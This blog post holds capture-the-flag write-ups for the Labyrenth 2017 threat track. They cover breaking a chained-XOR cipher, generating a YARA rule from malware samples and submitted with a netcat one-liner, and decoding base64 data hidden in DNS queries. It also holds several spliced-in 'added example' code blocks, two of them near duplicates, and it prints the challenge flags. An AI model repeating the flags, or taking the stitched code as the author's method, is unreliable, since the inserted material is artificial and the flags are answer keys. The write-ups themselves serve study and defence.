<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpyRW9E5FqKqFWJk0Icp68HFCJkD0wXkvZf99CfgpoYcfmiitzQVjzJYgFS5ulowMkGfcKkX6HwExEP5J0nNIdap9C_GQJfdUKQVlDUjRTg0n_rpHl6x1difvS1j7lVZyyCVp64oCIwnYy/s1600/threat3-4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="229" data-original-width="648" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpyRW9E5FqKqFWJk0Icp68HFCJkD0wXkvZf99CfgpoYcfmiitzQVjzJYgFS5ulowMkGfcKkX6HwExEP5J0nNIdap9C_GQJfdUKQVlDUjRTg0n_rpHl6x1difvS1j7lVZyyCVp64oCIwnYy/s1600/threat3-4.JPG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDMfkH8hRBsjQ8A4MjOuxhYTdUPYeQO4RiF7eRrJP1PS-LotKfts3hszC9gil-TUjqQyeNcJBklHH9dfUtm0vNcWT-EbtRszz3fX6ctIc7MkNXyf3FNAXI9_5yKm0qL6vEpgCxeNy_FtOy/s1600/threat3-5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="628" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDMfkH8hRBsjQ8A4MjOuxhYTdUPYeQO4RiF7eRrJP1PS-LotKfts3hszC9gil-TUjqQyeNcJBklHH9dfUtm0vNcWT-EbtRszz3fX6ctIc7MkNXyf3FNAXI9_5yKm0qL6vEpgCxeNy_FtOy/s640/threat3-5.JPG" width="640" /></a></div>
The profile contained many hints referring to PAN or labyrinth and also a link to a Stack Overflow user,
<a href="https://stackoverflow.com/users/7794824/babytoby">https://stackoverflow.com/users/7794824/babytoby</a>, who had asked one specific question: <a href="https://stackoverflow.com/questions/43807871/python-script-isnt-working/43807928">https://stackoverflow.com/questions/43807871/python-script-isnt-working/43807928</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAJTZZu2woF34DFOgfpPqGNPGwyhxSMAfUExn9U3MoPEO-qYN_d8pV6MOYUG9Iy6Pn3DnCWnOqcWVe2IvvDJQYt4dYDSVp_gyk7sHGA5EeKcwrC6L67w_Lny6iF0u7hocINQq5Jddp8dw_/s1600/threat3-6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="741" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAJTZZu2woF34DFOgfpPqGNPGwyhxSMAfUExn9U3MoPEO-qYN_d8pV6MOYUG9Iy6Pn3DnCWnOqcWVe2IvvDJQYt4dYDSVp_gyk7sHGA5EeKcwrC6L67w_Lny6iF0u7hocINQq5Jddp8dw_/s1600/threat3-6.JPG" /></a></div>
Having a look at the given Python code immediately raised some suspicions: it contained weird and obvious errors. I cleaned up the code and tried the given test parameters.<br />
<br />
<blockquote class="tr_bq">
def encrypt(varAble1, varAble2):<br />
    varAble1_size = len(varAble1)/float(len(varAble2))<br />
    if str(varAble1_size).split(".")[1] == "0":<br />
        pass<br />
    else:<br />
        while str(varAble1_size).split(".")[1] != "0":<br />
            varAble1 += "@"<br />
            varAble1_size = len(varAble1)/float(len(varAble2))<br />
    code = []<br />
    varAble1 = list(varAble1)<br />
    varAble2 = list(varAble2)<br />
    multiply_size = int(str((varAble1_size)).split(".")[0]) * 8<br />
    while varAble1 != []:<br />
        p_varAble1 = varAble1[0:8]<br />
        p_varAble2 = varAble2[0:8]<br />
        temp_list = []<br />
        for i in xrange(0,8):<br />
            if type(p_varAble2[i]) == type(int):<br />
                new_ct = (ord(chr(p_varAble2[i])) ^ ord(p_varAble1[0]))<br />
            else:<br />
                try:<br />
                    new_ct = (ord(p_varAble2[i]) ^ ord(p_varAble1[0]))<br />
                except:<br />
                    new_ct = ((p_varAble2[i]) ^ ord(p_varAble1[0]))<br />
            code.append(new_ct)<br />
            temp_list.append(new_ct)<br />
            varAble1.pop(0)<br />
            p_varAble1.pop(0)<br />
        varAble2 = temp_list<br />
        varAble2.reverse()<br />
    code.reverse()<br />
    #varAble1 = code.reverse()<br />
    code_text = []<br />
    for i in code:<br />
        hex_value = hex(i)<br />
        if len(hex_value) != 4:<br />
            code_text.append("0" + hex(i)[2:])<br />
        else:<br />
            code_text.append(hex(i)[2:])<br />
    code_text = "".join(code_text).upper()<br />
    return code_text</blockquote>
I realized that the password parameter only matters for the first 8 bytes of the output; afterwards the result of the previous XOR step is used as the password for the next 8-byte chunk. To revert the operation one can simply XOR the last two chunks of the encoded output with each other and repeat the process. Only the last chunk needs the user-supplied password. If n is the last chunk, the decryption algorithm is to XOR chunk[n] ^ chunk[n-1], chunk[n-1] ^ chunk[n-2], and so on, and concatenate the results. Running the following code with the comment from the website and without supplying a password<br />
<br />
<blockquote class="tr_bq">
def decryptor(encoded_text,password=''):<br />
    chunks = [encoded_text[i:i+2] for i in range(0, len(encoded_text), 2)]<br />
    x = len(chunks)<br />
    res=[]<br />
    p_1 = ''<br />
    p_2 = ''<br />
    while(x > 8):<br />
        p_1 = chunks[x-8:x]<br />
        p_2 = chunks[x-16:x-8][::-1]<br />
        temp = ''<br />
        for i in range(0,8):<br />
            temp+=chr(int(p_1[i],16)^int(p_2[i],16))<br />
        res.append(temp)<br />
        x-=8<br />
    if len(password) == 8:<br />
        x = len(chunks)<br />
        p_1 = chunks[x-8:x][::-1]<br />
        temp = ''<br />
        for i in range(0,8):<br />
            temp+=chr(int(p_1[i],16)^ord(password[i]))<br />
        res = [temp]+res<br />
    print ''.join(res)</blockquote>
<br />
prints<br />
<br />
<blockquote class="tr_bq">
f45c4ba9286f2edf9f7e2d0def096b903541600624c299a731b8520bdedf}@@@</blockquote>
<br />
<br />
which looks promising. We know that the flag has to start with PAN{, so I calculated the first 4 characters of the password to be <i>baby</i>. I remembered that the username of the Stack Overflow account was babytoby; calling the function with the password <i>babytoby</i> gives us the flag<br />
<blockquote class="tr_bq">
<b>PAN{61dcf45c4ba9286f2edf9f7e2d0def096b903541600624c299a731b8520bdedf}</b></blockquote>
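As an added example for this write-up (not the author's decryptor and not the Stack Overflow code), the following Python 3 re-implements the "encrypt" scheme and its inverse so the chaining is explicit: the key for every block after the first is the previous ciphertext block reversed, and the whole ciphertext is reversed once more before hex-encoding. <i>SITE_COMMENT_HEX</i> and the password <i>babytoby</i> are the values from this post; the flag is used only as the expected result. Unlike the author's version, the decryptor shows the first block as question marks when no password is given, and <i>recover_password_prefix</i> carries out the "PAN{ gives baby" step from above.<br />

```python
# Added example (not the author's code): the chained-XOR scheme from the
# Stack Overflow snippet, re-implemented in Python 3 with its inverse.
BLOCK = 8   # the challenge code works on 8-byte chunks with an 8-byte password

# Values from the write-up: the hex comment from the page source and the password.
SITE_COMMENT_HEX = (
    "642C740D0C297E3A5E1B4D6A70346C24175D56485F7F2B3C0E1F1C6D716F3C20"
    "13095B405B2C2F385D491C62763930231A560E13507879390B414E36216B327C"
    "1A065E42022C2032"
)
PASSWORD = "babytoby"


def chain_xor_encrypt(plaintext, password):
    """What encrypt() does: pad with '@' to a block multiple, XOR each block with the
    current key, use the reversed ciphertext block as the next key, then reverse the
    whole ciphertext and hex-encode it in upper case."""
    if len(password) != BLOCK:
        raise ValueError("the challenge code needs an 8-character password")
    data = plaintext.encode("latin-1")
    data += b"@" * (-len(data) % BLOCK)
    key = password.encode("latin-1")
    out = bytearray()
    for off in range(0, len(data), BLOCK):
        block = bytes(p ^ k for p, k in zip(data[off:off + BLOCK], key))
        out += block
        key = block[::-1]
    return out[::-1].hex().upper()


def chain_xor_decrypt(hex_text, password=None):
    """Every block after the first is recoverable from the ciphertext alone, since its
    key is just the previous ciphertext block reversed; the first block needs the
    password and is shown as '?' characters when none is given."""
    if password is not None and len(password) != BLOCK:
        raise ValueError("password must be exactly %d characters" % BLOCK)
    ct = bytes.fromhex(hex_text)[::-1]         # undo the final reversal
    if not ct or len(ct) % BLOCK:
        raise ValueError("ciphertext length is not a multiple of the block size")
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pieces = []
    for idx, block in enumerate(blocks):
        if idx > 0:
            key = blocks[idx - 1][::-1]
        elif password is not None:
            key = password.encode("latin-1")
        else:
            pieces.append("?" * BLOCK)
            continue
        pieces.append(bytes(c ^ k for c, k in zip(block, key)).decode("latin-1"))
    return "".join(pieces)


def recover_password_prefix(hex_text, known_plaintext):
    """Known plaintext against the first block: the flag format 'PAN{' yields 'baby'."""
    first = bytes.fromhex(hex_text)[::-1][:BLOCK]
    return bytes(c ^ ord(p) for c, p in zip(first, known_plaintext)).decode("latin-1")


if __name__ == "__main__":
    print(recover_password_prefix(SITE_COMMENT_HEX, "PAN{"))
    print(chain_xor_decrypt(SITE_COMMENT_HEX))
    print(chain_xor_decrypt(SITE_COMMENT_HEX, PASSWORD))
```

The weakness the write-up exploits is visible in <i>chain_xor_decrypt</i>: because each block's key is derived from the previous ciphertext block, the password protects only the first 8 bytes, and a known plaintext prefix of that block leaks the password byte for byte.<br />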
Mr. Joneshttp://www.blogger.com/profile/15346255825408058734noreply@blogger.com0tag:blogger.com,1999:blog-761861405376292116.post-87711474863905098112017-07-24T15:46:00.001+02:002017-07-24T16:55:42.891+02:00Palo Alto Labyrenth Threat 02 Writeup<h2>
Labyrenth 2017 Threat 02</h2>
While reading the description for the challenge I realized something odd: it contained instructions that weren't actually needed but sounded familiar. This sentence in particular was odd<br />
<br />
<blockquote class="tr_bq">
The samples are included in yara_samples.7z password is "infected"</blockquote>
because there was no yara_samples.7z. I checked my folder from Labyrenth 2016 and had a match for the Threat 06 challenge from last year. (<a href="https://researchcenter.paloaltonetworks.com/2016/09/labyrenth-capture-the-flag-ctf-threat-track-solutions/">Labyrenth 2016 Track solution</a>)<br />
<br />
The challenge looks exactly the same, just with a different set of samples. The old solution suggests bindiffing two of the smallest files, so let's do that. At first I tried the approach the 2016 solution recommended, ordering by basic blocks. As I was lazy and wanted to reuse the Python script from last year's solution, I checked what it required. Basically it wants a file containing the hex values of each file we want to compare, each line starting with the same byte pattern. Say the pattern should start with 0xDE 0xAD 0xBE 0xEF; the file would then look like this<br />
<br />
<blockquote class="tr_bq">
DEADBEEF... bytes in file1<br />
DEADBEEF... bytes in file2<br />
...</blockquote>
If we chose the right pattern, the file should contain an entry for each of our 56 files. So I bindiffed the two smallest files, <i>ef763faec48e5e29d63c38088b2fc3cebb5086bb805e6f3b020649c7bbbf8614</i> and <i>de8d6ef64a8d9137834013f7263e9bdebb3be48f562af5679779376aaab0af5a</i>, and ordered the results by matching basic blocks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bsPRJNVS3jGOcqXpa6UxxQ2YrcyUGQ_OnOFsaB_kydLsNQ9xwAIidBcms2zeqsoEp4eHSJT2tdyWekqePCj-GAI6cUntj0HgFxV9Po7mayLWjTZ0YmwykVlkZz1yToGK2dqRKjFj_yRX/s1600/threat2-1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="1461" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2bsPRJNVS3jGOcqXpa6UxxQ2YrcyUGQ_OnOFsaB_kydLsNQ9xwAIidBcms2zeqsoEp4eHSJT2tdyWekqePCj-GAI6cUntj0HgFxV9Po7mayLWjTZ0YmwykVlkZz1yToGK2dqRKjFj_yRX/s1600/threat2-1.JPG" /></a></div>
<br />
<h4>
First try</h4>
I checked the first 5 sub_x entries (the directions stated that the rule should only match the given samples, so trying library functions doesn't make sense) by taking the first bytes of each function and trying the following bash command<br />
<blockquote class="tr_bq">
for i in *; do xxd -p "$i" | tr -d '\n' | grep -o '[bytepattern].*' >> ~/hex_values.txt; done </blockquote>
followed by yara.py (which I copied from last year's solution). Without success.<br />
<br />
<h4>
Second try</h4>
<br />
My next approach was to order by matched instructions, with the given hint in mind:<br />
<blockquote class="tr_bq">
Hint: You drop me when you want to stop and lift me up when you want</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAB6yVU4x0ekYvK3MSMMP3OB7OEEhE5_SM-lxiNNJU_aONOcVQ058wL8gvMKaL4Y1ngGQinr_eFl24NuZ4xon5gwLzcnfOxHP1u44NsUlUyq2yfBH6I_iYxAEJOnU3jxG59wRJkFwW6JO/s1600/threat2-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="1462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAB6yVU4x0ekYvK3MSMMP3OB7OEEhE5_SM-lxiNNJU_aONOcVQ058wL8gvMKaL4Y1ngGQinr_eFl24NuZ4xon5gwLzcnfOxHP1u44NsUlUyq2yfBH6I_iYxAEJOnU3jxG59wRJkFwW6JO/s1600/threat2-2.JPG" /></a></div>
<br />
When I opened sub_10001250_9, I had a good feeling about it because I saw some imports (which would make sense given the hint), so I gave it a try:<br />
<br />
<blockquote class="tr_bq">
for i in *; do xxd -p "$i" | tr -d '\n' | grep -o '53568b35.*' >> ~/hex_values.txt; done</blockquote>
I checked <i>wc ~/hex_values.txt</i>, which returned 56, the number of samples, and ran the aforementioned yara.py. The result was<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;"> 53568b35???????05768???????0ffd668???????08bf8ffd668???????0ffd668???????0ffd68b35???????068???????0578bd8ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????053a3???????0ffd668???????053a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????057a3???????0ffd668???????0a3???????057ffd668???????057a3???????0ffd668???????057a3???????0ffd65f5ea3???????05bc3</span></blockquote>
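The yara.py from the 2016 solution is not reproduced here, so the following is an added example, written for this write-up, of what such a script has to do with the hex_values.txt produced above: align the dumps nibble by nibble, keep every nibble on which all samples agree and wildcard the rest, which is why the result contains per-nibble wildcards like <i>???????0</i> where absolute addresses differ. The three input lines are constructed stand-ins, not the challenge samples; the rule name is a placeholder, and <i>pattern_matches</i> is a local check that the pattern really hits every sample before anything is sent to the server.<br />

```python
import re

# Added example (not the yara.py from the 2016 solution). The three lines below are
# constructed stand-ins for ~/hex_values.txt: each starts at the same code bytes
# (53 56 8b 35 ...) and differs only in 4-byte immediates, as absolute addresses do.
SAMPLE_HEX_LINES = [
    "53568b351020001057681c30001068a0200010ffd6",
    "53568b352020001057682c30001068b0200010ffd6",
    "53568b353020001057683c30001068c0200010ffd6",
]


def common_nibble_pattern(lines):
    """Align the dumps nibble by nibble; keep a nibble where all samples agree, else '?'."""
    lines = [line.strip().lower() for line in lines if line.strip()]
    if not lines:
        raise ValueError("no samples")
    if any(re.fullmatch(r"[0-9a-f]+", line) is None for line in lines):
        raise ValueError("input must be plain hex, one sample per line")
    width = min(len(line) for line in lines)
    width -= width % 2                       # whole bytes only
    nibbles = []
    for i in range(width):
        column = {line[i] for line in lines}
        nibbles.append(lines[0][i] if len(column) == 1 else "?")
    pattern = re.sub(r"(\?\?)+$", "", "".join(nibbles))   # trailing ?? bytes add nothing
    if not pattern or pattern.startswith("??"):
        raise ValueError("samples do not share leading bytes; anchor the grep on a fixed prefix")
    return pattern


def pattern_matches(pattern, hex_line):
    """Local sanity check before submitting: does the pattern hit this sample's dump?"""
    regex = "".join("[0-9a-f]" if ch == "?" else ch for ch in pattern)
    return re.search(regex, hex_line.strip().lower()) is not None


def to_yara_rule(pattern, rule_name="labyrenth_threat02", string_id="yara_challenge02"):
    """Emit the rule in the template's shape: one hex string and '1 of them'."""
    spaced = " ".join(pattern[i:i + 2] for i in range(0, len(pattern), 2))
    return (
        "rule %s\n{\n    strings:\n        $%s = { %s }\n"
        "    condition:\n        1 of them\n}\n" % (rule_name, string_id, spaced)
    )


def build_rule_from_file(path):
    """Read a hex_values.txt as produced by the xxd/grep loop and print the rule."""
    with open(path) as fh:
        lines = fh.readlines()
    pattern = common_nibble_pattern(lines)
    misses = [line for line in lines if line.strip() and not pattern_matches(pattern, line)]
    if misses:
        raise ValueError("pattern does not match %d of the input lines" % len(misses))
    return to_yara_rule(pattern)


if __name__ == "__main__":
    pat = common_nibble_pattern(SAMPLE_HEX_LINES)
    print(pat)
    print(to_yara_rule(pat))
```

The check in <i>build_rule_from_file</i> matters because the hex_values.txt line count (56 here) only proves that the grep anchor was found in every sample, not that the wildcarded pattern still matches all of them; a pattern that is too long will silently drop samples whose dump is shorter.<br />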
<br />
If you look at sub_1001250 you can see that the pattern matches the entire function. So all that's left is to copy that rule into the given template and send it to the server with netcat:<br />
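The writeup's yara.py is not reproduced here, so as an added example (my code, not the author's) this is one way to turn the per-sample hex dumps collected in hex_values.txt into a single YARA hex string: every nibble that differs between samples becomes a wildcard, which is why the addresses in the pattern above show up as <i>???????0</i>. The sample dumps, the rule template and the <i>cut_after</i> cut-off are assumptions made for the example.

```python
"""Added example, not the writeup's yara.py (whose source is not shown):
build one YARA hex string from the hex dumps in hex_values.txt,
wildcarding every nibble that differs between samples."""

def build_hex_pattern(hex_strings, cut_after=None):
    """Nibble-wise consensus of hex dumps that start at the same function.

    Positions that differ in any sample become '?'. The comparison stops at
    the shortest sample; `cut_after` (a hex byte sequence such as "5bc3" for
    pop ebx / ret) optionally truncates the result after its first occurrence.
    """
    dumps = [h.strip().lower() for h in hex_strings if h.strip()]
    if not dumps:
        raise ValueError("no samples")
    width = min(len(d) for d in dumps) & ~1          # whole bytes only
    consensus = "".join(
        nibbles[0] if len(set(nibbles)) == 1 else "?"
        for nibbles in zip(*(d[:width] for d in dumps))
    )
    if cut_after:
        end = consensus.find(cut_after.lower())
        if end < 0:
            raise ValueError(f"{cut_after} not found in consensus")
        consensus = consensus[: end + len(cut_after)]
    return consensus

def to_yara_hex(consensus):
    """Format the nibble pattern as a YARA hex string, e.g. { 53 56 ?0 }."""
    return "{ " + " ".join(consensus[i:i + 2] for i in range(0, len(consensus), 2)) + " }"

def make_rule(consensus, name="auto_generated"):
    """Wrap the hex string in a minimal rule (the challenge template is assumed)."""
    fixed = sum(1 for c in consensus if c != "?")
    if fixed < 16:    # fewer than 8 fixed bytes would match far too much
        raise ValueError("pattern too weak: %d fixed nibbles" % fixed)
    return ("rule %s {\n    strings:\n        $a = %s\n    condition:\n        $a\n}"
            % (name, to_yara_hex(consensus)))

# Constructed dumps standing in for hex_values.txt: the same function in three
# builds, so only the embedded absolute addresses vary (third dump is longer).
SAMPLES = [
    "53568b35a012001057ffd65f5ea3b81200105bc3",
    "53568b35a022400057ffd65f5ea3b82240005bc3",
    "53568b35a0f2a01057ffd65f5ea3b8f2a0105bc3cccccc",
]

if __name__ == "__main__":
    print(make_rule(build_hex_pattern(SAMPLES, cut_after="5bc3")))
```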
<br />
<blockquote class="tr_bq">
cat rule.txt | netcat 52.42.81.161 8082</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt4H63e8VTy-LiEVb-dXZxwv20SnmF_z0WfLFTCqJSY_iDO1J4Tt0tHn_LLm_TGMKvF6H4hpvM7WamZsrrhp3zNcPYYY5spEll17q6JfgOZlYqkOrgij-0bOwGUF4vbpML65YzlD5_aHE/s1600/threat2-final.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="260" data-original-width="721" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLt4H63e8VTy-LiEVb-dXZxwv20SnmF_z0WfLFTCqJSY_iDO1J4Tt0tHn_LLm_TGMKvF6H4hpvM7WamZsrrhp3zNcPYYY5spEll17q6JfgOZlYqkOrgij-0bOwGUF4vbpML65YzlD5_aHE/s400/threat2-final.JPG" width="400" /></a></div>
<br />
<br />
Which gives us the flag:<br />
<blockquote class="tr_bq">
<b>PAN{AllByMyself}</b></blockquote>
Mr. Jones, noreply@blogger.com, http://www.blogger.com/profile/15346255825408058734<br />
<br />
Palo Alto Labyrenth Threat 01 Writeup (published 2017-07-24 10:22 +02:00, updated 2017-07-24 16:56 +02:00)<h2>
Labyrenth 2017 Threat 01</h2>
For the first challenge of the threat track we are given a file called challenge.pcap.<br />
<br />
Opening the pcap in Wireshark reveals a bunch of DNS requests.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeJV-AkI1UFnXbWwWS4nxDL8BD2SiDLAxLSQLce-ZhQe661HHy0LVDvh7igsxBpAEVPdusQBGUu_Jq5VhrEELWjzI1k81qz1ZiY6R8jGn_RFYpj5fzj1wmO7TForaBjNcB4M4BVIPEajv/s1600/threat1-1.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="216" data-original-width="1374" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeJV-AkI1UFnXbWwWS4nxDL8BD2SiDLAxLSQLce-ZhQe661HHy0LVDvh7igsxBpAEVPdusQBGUu_Jq5VhrEELWjzI1k81qz1ZiY6R8jGn_RFYpj5fzj1wmO7TForaBjNcB4M4BVIPEajv/s640/threat1-1.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">challenge.pcap</td></tr>
</tbody></table>
<br />
Looking at the raw requests, one immediately notices a bunch of additional bytes.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img border="0" data-original-height="83" data-original-width="483" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRIvW4qatBI8PQJEXAuHmCDxgxLtCH0JJAEANhWdHoXmGA3sPY8ZDlU8YLDIlp9EHLQsZpmzPFyC1dgzYvgU-aYVUz26-oOU3IEa7bRhQldNAOYYPRxjnN_qOAAqLlZQFNQHn6s7zcTu7q/s400/threat1-2.JPG" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;">unusual bytes in DNS request</td></tr>
</tbody></table>
Given the small file size I decided to open the pcap in Notepad++ and extract the additional bytes manually.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd5yXdaz5t7dqu4hyphenhyphenjId7jpdv7fXBU_enXLo9MoXtL3PlYR-Xd2dBcPND9Fksq2deXUqkQ3i5Yp-7kWPHY84SBWDqXWIjDCWbfCMSPgHECfjZqoBjceX96Bh5FwRGzJv0pyhfvC7jeZ6oE/s1600/threat1-3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="479" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd5yXdaz5t7dqu4hyphenhyphenjId7jpdv7fXBU_enXLo9MoXtL3PlYR-Xd2dBcPND9Fksq2deXUqkQ3i5Yp-7kWPHY84SBWDqXWIjDCWbfCMSPgHECfjZqoBjceX96Bh5FwRGzJv0pyhfvC7jeZ6oE/s400/threat1-3.JPG" width="380" /></a></div>
<br />
<br />
This gives the following sequence:<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">UEsDBBQAAAAIAOCIr0qMVwGeKQAAACoAAAAIABwAZmlsZS5kYXRVVAkAA3QYGlmBGBpZdXgLAAEE6AMAAAToAwAAC3D0q3bMyQnIz8wrSS0q9sxz8QsOzsgvzUkBCzklJmeXJxalFNdyAQBQSwECHgMUAAAACADgiK9KjFcBnikAAAAqAAAACAAYAAAAAAAB7AAAAtIEAAAAAZmlsZS5kYXRVVAUAA3QYGll1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAawAAAAAA</span></blockquote>
Given the character set I guessed it to be a base64-encoded string, so I used some Python code to base64-decode the string and write the result to a file. To avoid decoding errors I just skipped the last character.<br />
<br />
<blockquote class="tr_bq">
import base64<br />
target = "UEsDBBQAAAAIAOCIr0qMVwGeKQAAACoAAAAIABwAZmlsZS5kYXRVVAkAA3QYGlmBGBpZdXgLAAEE6AMAAAToAwAAC3D0q3bMyQnIz8wrSS0q9sxz8QsOzsgvzUkBCzklJmeXJxalFNdyAQBQSwECHgMUAAAACADgiK9KjFcBnikAAAAqAAAACAAYAAAAAAAB7AAAAtIEAAAAAZmlsZS5kYXRVVAUAA3QYGll1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAawAAAAAA"<br />
out_file = open('b64.bin', 'wb')<br />
# the string is one character too long for base64, so drop the last one<br />
out_file.write(base64.b64decode(target[:-1]))<br />
out_file.close()</blockquote>
<br />
Opening the output in HxD reveals the byte sequence "50 4B 03 04" which might indicate a zip file.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZGtPqUUiDEVBS7GcXNjQgpxP-hyBWXeOtE0EeXLsPOyFnPX0CRSZYkghzwXH5YcnXkMyw6KmmuNUFaZMqFiNFAA98rTybUR0lbC2A0p4WsIlNHl15c0VmBTAyzOqPeRQzLWrAHw4DimyU/s1600/threat1-4.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="624" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZGtPqUUiDEVBS7GcXNjQgpxP-hyBWXeOtE0EeXLsPOyFnPX0CRSZYkghzwXH5YcnXkMyw6KmmuNUFaZMqFiNFAA98rTybUR0lbC2A0p4WsIlNHl15c0VmBTAyzOqPeRQzLWrAHw4DimyU/s400/threat1-4.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">b64 decoded file with zip file header</td></tr>
</tbody></table>
<br />
So I tried 7-zip "Extract Here", which gave me some warnings but also extracted a file called file.dat.<br />
<br />
Opening that file in Notepad++ revealed the first flag:<br />
<blockquote class="tr_bq">
<b>PAN{AllPointersInDNSShouldPointBackwards}</b></blockquote>
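The manual steps above (pull the extra bytes out of the DNS queries, base64-decode with the stray trailing character dropped, check for the PK header, read file.dat) as one added Python example; this is my code, not the writeup's. It assumes the extra bytes sit after the question section of each query, and the queries it works on are constructed in the block rather than taken from challenge.pcap.

```python
"""Added example (not the writeup's own code): pull the trailing bytes that
follow the question section of DNS queries, base64-decode them leniently and
read the resulting zip in memory. The queries below are constructed here."""
import base64
import io
import struct
import zipfile

def dns_trailing_bytes(msg: bytes) -> bytes:
    """Return whatever follows the last question of a DNS query message."""
    _id, _flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    if an or ns or ar:
        raise ValueError("only plain queries without RR sections are handled")
    pos = 12
    for _ in range(qd):
        while msg[pos] != 0:      # walk the QNAME labels
            pos += 1 + msg[pos]
        pos += 1 + 4              # terminating zero, then QTYPE + QCLASS
    return msg[pos:]

def lenient_b64decode(text: str) -> bytes:
    """Drop stray trailing characters so the length is a multiple of 4."""
    text = text.strip()
    return base64.b64decode(text[: len(text) - len(text) % 4])

def recover_zip_members(queries) -> dict:
    """Reassemble the smuggled base64 text; return {name: bytes} for the zip."""
    blob = b"".join(dns_trailing_bytes(q) for q in queries).decode("ascii")
    data = lenient_b64decode(blob)
    if data[:4] != b"PK\x03\x04":  # local file header magic seen in HxD
        raise ValueError("decoded data does not start with a zip header")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}

def build_query(name: str, extra: bytes) -> bytes:
    """Constructed A query for `name` with `extra` appended after the question."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
    return header + qname + struct.pack("!HH", 1, 1) + extra

# Constructed sample: a zip holding file.dat, base64-encoded, with one stray
# trailing character, split across several queries like the challenge traffic.
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("file.dat", "PAN{constructed_sample_flag}")
_b64 = base64.b64encode(_buf.getvalue()) + b"A"
SAMPLE_QUERIES = [build_query("example.com", _b64[i:i + 40])
                  for i in range(0, len(_b64), 40)]
```

Calling recover_zip_members(SAMPLE_QUERIES) returns the members without ever writing b64.bin to disk, which also sidesteps the 7-zip warnings when the archive's trailing bytes are off.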
Mr. Jones, noreply@blogger.com, http://www.blogger.com/profile/15346255825408058734